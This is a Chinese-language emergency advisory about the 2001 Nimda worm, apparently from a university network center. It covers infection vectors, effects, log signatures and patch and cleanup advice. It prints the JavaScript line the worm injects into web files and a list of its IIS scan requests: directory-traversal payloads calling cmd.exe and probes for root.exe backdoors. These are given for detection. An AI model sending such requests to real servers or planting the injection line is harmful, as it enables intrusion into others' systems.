防范Nimda蠕虫病毒的紧急通知



附:杀毒软件和系统补丁请从该地址下载:ftp://Ithome.uestc.edu.cn/incoming_soft/Nimda病毒相关

9月18日,一种更具破坏力的恶意代码——Nimda worm 蠕虫开始在Internet上迅速蔓延传播。Nimda蠕虫病毒感染Windows 系列多种计算机系统,通过多种渠道传播,其传播速度之快、影响范围之广、破坏力之强都超过Code Red II。

一 、影响系统

Windows95, 98,ME,NT 和2000  所有客户端和服务器系统

二 、传播方式

通过电子邮件从一个客户端感染另一个客户端
通过开放的网络共享从一个客户端感染另一个客户端
通过浏览被感染的网站从Web 服务器感染客户端
通过主动扫描或利用 “Microsoft IIS 4.0 / 5.0 directory traversal” 的缺陷” 从客户端感染Web 服务器
通过扫描 “Code Red” (IN-2001-09),和 “sadmind/IIS” (CA-2001-11)  留下的后门从客户端感染Web 服务器

三 、影响

感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda病毒的邮件的拷贝。
同样的,客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒留下的后门:Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]; 它也试图利用IIS Directory Traversal 漏洞 (VU #111677)。
初步分析表明, 该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通过大量发送电子邮件和扫描网络可以导致网络的“拒绝服务”(DoS)。

四 、分析

被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦在该服务器上运行,蠕虫就会遍历系统里的每一个目录(甚至包括所有通过共享文件可以读取得目录),然后会在磁盘里留下一份自身拷贝,取名为\\\\\\\"README.EML\\\\\\\"。一旦找到了含有web内容的目录(包含html或asp文件),下面Javascript代码段就会被添加到每一个跟web有关的文件中:

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
 
这段代码使得蠕虫可以进一步繁衍,通过浏览器或浏览网络文件感染到新的客户端。
通过浏览器传播
作为感染过程的一部分,Nimda 更改所有的含有web内容的文件(象 .htm, ,html, .asp 等文件)。这样,任何用户浏览该文件,不管是通过浏览器还是网络,就可能会下载一份该病毒。有些浏览器会自动的执行下载动作,感染正在浏览该网站的机器。
通过文件系统感染
Nimda病毒生成大量的自身的复本,取名为README.EML, 写到该用户有可写权限的目录里。如果在另一台机器的用户通过网络共享选取病毒文件,并且设置了预览功能的话,蠕虫就会威胁到这台新的机器。
系统记录
对任何开放80/tcp端口的web服务器,Nimda蠕虫的扫描会生成下面的日志:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/../xc1x1c../..xc1\x1c../..\xc1\\x1c../winnt/
 system32/cmd.exe?/c+dir
GET /scripts/..xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
注:这个例子的前四行表明在试图连接Red Code II 留下的后门,例子的其余部分在试图利用Directory Traversal 漏洞。

五 、解决方案

5.1  对IIS系统管理员的建议
1. 检查系统是否被感染,查找以下内容:
¨ root.exe (表明系统受到过Code Red II或sadmind/IIS蠕虫的损害,易于受到Nimdaa蠕虫的攻击)
¨ 在包含网络内容的目录下的admin.dll或异常.eml文件(表明受到Nimdaa蠕虫的攻击)
要从损害中恢复系统,只有从安全的来源重装系统和系统软件(供应商提供的光盘)。重装后还应安装全部安全补丁。这个过程中系统应与网络断开连接。如果所有网络服务关闭的话,也可以从网络下载补丁。
  具体的恢复细节可以参考  CERT/CC网站,
http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
2. 从提供商处获取补丁
对所有与IIS相关的漏洞,可以从下面站点下载补丁:
    http://www.ccert.edu.cn
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
5.2  对端用户的建议
1.从提供商处获取补丁
对使用有漏洞的IE的用户,建议从下面下载针对Automatic Execution of Embedded MIME Types漏洞的补丁:
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
2.运行和维护防病毒产品
升级反病毒软件是重要的,多数反病毒软件供应商已经提供病毒库或相关信息和工具,从而提供对系统的保护并能部分恢复系统。如果反病毒软件包能够自动升级,建议使用自动升级。
3.在打补丁之前,不要查看来历不明的电子邮件,更不能打开附件。
Nimdaa蠕虫可以作为email的readme.exe附件,不能打开这种附件。
如果使用Outlook Express ,这种邮件连看都不能看。
4.关闭JavaScript,Nimdaa蠕虫可以利用网页浏览感染端用户的系统,这种感染方式利用JavaScript传播,因此建议关闭JavaScript。